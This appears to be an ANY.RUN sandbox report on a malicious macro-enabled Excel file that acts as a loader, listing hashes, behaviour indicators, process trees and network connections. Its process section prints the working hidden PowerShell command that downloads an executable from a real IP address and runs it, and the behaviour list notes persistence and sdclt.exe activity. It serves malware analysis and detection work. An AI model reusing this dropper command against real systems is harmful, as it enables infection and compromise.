analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

scan00392.xlsm

Full analysis: https://app.any.run/tasks/a9dd41cd-73e2-419a-ac39-07d524d67e39
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 30, 2020, 22:46:34
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
macros
macros-on-open
opendir
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

16D28E813AAD1811513180F81B5F565B

SHA1:

5CC22AC2151CB66642A3D25F4445EFA02F65F7C4

SHA256:

10774669E30B7EE754CE9C2F9582339D5FAFC2FA97EDCB7830A3B736AECBC9D0

SSDEEP:

12288:T3g49w8fyunGthwu8kxPthZugvq4jzjSGUuNd:zg49b7AhFxPthZnvL3tX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 5180)
    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 5180)
    • Application was dropped or rewritten from another process

      • newfile.Exe (PID: 1916)
      • newfile.Exe (PID: 3412)
      • images.exe (PID: 1076)
    • Downloads executable files from IP

      • powershell.exe (PID: 3800)
    • Changes settings of System certificates

      • powershell.exe (PID: 3800)
      • control.exe (PID: 3824)
      • newfile.Exe (PID: 1916)
      • EXCEL.EXE (PID: 5180)
      • powershell.exe (PID: 4212)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3800)
    • Changes the autorun value in the registry

      • newfile.Exe (PID: 3412)
    • Runs app for hidden code execution

      • images.exe (PID: 1076)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3800)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 4212)
      • powershell.exe (PID: 6112)
    • Reads Environment values

      • powershell.exe (PID: 3800)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3800)
      • newfile.Exe (PID: 3412)
    • Modifies the open verb of a shell class

      • newfile.Exe (PID: 1916)
    • Executed via COM

      • DllHost.exe (PID: 5964)
    • Checks supported languages

      • control.exe (PID: 3824)
    • Creates files in the program directory

      • newfile.Exe (PID: 3412)
    • Executes PowerShell scripts

      • newfile.Exe (PID: 3412)
      • images.exe (PID: 1076)
    • Starts itself from another location

      • newfile.Exe (PID: 3412)
    • Starts CMD.EXE for commands execution

      • images.exe (PID: 1076)
    • Adds / modifies Windows certificates

      • powershell.exe (PID: 4212)
    • Connects to unusual port

      • images.exe (PID: 1076)
  • INFO

    • Scans artifacts that could help determine the target

      • EXCEL.EXE (PID: 5180)
    • Reads Environment values

      • EXCEL.EXE (PID: 5180)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 5180)
    • Reads the machine GUID from the registry

      • EXCEL.EXE (PID: 5180)
    • Reads the software policy settings

      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 4212)
      • powershell.exe (PID: 6112)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3800)
      • powershell.exe (PID: 4212)
      • powershell.exe (PID: 6112)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 5180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xlsm | Excel Microsoft Office Open XML Format document (with Macro) (50.8)
.xlsx | Excel Microsoft Office Open XML Format document (30)
.zip | Open Packaging Conventions container (15.4)
.zip | ZIP compressed archive (3.5)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x0bb99cf2
ZipCompressedSize: 395
ZipUncompressedSize: 1257
ZipFileName: [Content_Types].xml

XMP

Creator: GODSON

XML

LastModifiedBy: 1R256Mp 1R256Mp
CreateDate: 2020:03:26 21:43:47Z
ModifyDate: 2020:03:26 22:39:35Z
Application: Microsoft Excel
DocSecurity: None
ScaleCrop: No
HeadingPairs:
  • Worksheets
  • 1
TitlesOfParts: Sheet1
Company: -
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
AppVersion: 16.03
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
111
Monitored processes
18
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe powershell.exe conhost.exe newfile.exe no specs sdclt.exe no specs sdclt.exe sdclt.exe no specs control.exe no specs COpenControlPanel no specs sdclt.exe newfile.exe powershell.exe no specs conhost.exe images.exe powershell.exe no specs cmd.exe no specs conhost.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
5180"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\admin\Desktop\scan00392.xlsm"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
16.0.12026.20264
3800powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://185.208.211.67/godson/arab101.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\newfile.Exe')C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
5732\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
1916"C:\Users\admin\AppData\Local\Temp\newfile.Exe" C:\Users\admin\AppData\Local\Temp\newfile.Exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
5768"C:\WINDOWS\system32\sdclt.exe" C:\WINDOWS\system32\sdclt.exenewfile.Exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Windows Backup
Exit code:
3221226540
Version:
10.0.16299.15 (WinBuild.160101.0800)
2612"C:\WINDOWS\system32\sdclt.exe" C:\WINDOWS\system32\sdclt.exe
newfile.Exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft® Windows Backup
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
5904"C:\WINDOWS\system32\sdclt.exe" C:\WINDOWS\system32\sdclt.exenewfile.Exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Windows Backup
Exit code:
3221226540
Version:
10.0.16299.15 (WinBuild.160101.0800)
3824"C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenterC:\Windows\System32\control.exesdclt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Control Panel
Exit code:
1
Version:
10.0.16299.15 (WinBuild.160101.0800)
5964C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\WINDOWS\SysWOW64\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
404"C:\WINDOWS\system32\sdclt.exe" C:\WINDOWS\system32\sdclt.exe
newfile.Exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft® Windows Backup
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Total events
4 453
Read events
4 145
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
10
Unknown types
3

Dropped files

PID
Process
Filename
Type
5180EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K8Z5U6HH0PCB8FWTIB5V.temp
MD5:
SHA256:
5180EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CWS8NGQT7VPFL8OGX04V.temp
MD5:
SHA256:
3800powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T4NY1BY7I9630CZ045KD.temp
MD5:
SHA256:
3800powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qsn3tysb.h0c.ps1
MD5:
SHA256:
3800powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_s04ypuuh.3hu.psm1
MD5:
SHA256:
5180EXCEL.EXEC:\Users\admin\Desktop\~$scan00392.xlsm
MD5:
SHA256:
5180EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F349BF19.jpg
MD5:
SHA256:
5180EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFDE22FB44AF42D4C6.TMP
MD5:
SHA256:
5180EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
MD5:
SHA256:
5180EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
52
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3800
powershell.exe
GET
200
185.208.211.67:80
http://185.208.211.67/godson/arab101.exe
NL
executable
1.03 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3800
powershell.exe
185.208.211.67:80
Hostio Solutions B.V.
NL
suspicious
5180
EXCEL.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
1076
images.exe
216.38.2.205:5200
GigeNET
US
malicious
5180
EXCEL.EXE
52.114.77.34:443
self.events.data.microsoft.com
Microsoft Corporation
IE
unknown
5608
svchost.exe
20.191.48.196:443
settings-win-ppe.data.microsoft.com
Microsoft Corporation
US
unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.3.128
whitelisted
self.events.data.microsoft.com
  • 52.114.77.34
  • 52.114.132.23
whitelisted
settings-win-ppe.data.microsoft.com
  • 20.191.48.196
whitelisted

Threats

PID
Process
Class
Message
3800
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3800
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3800
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3800
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info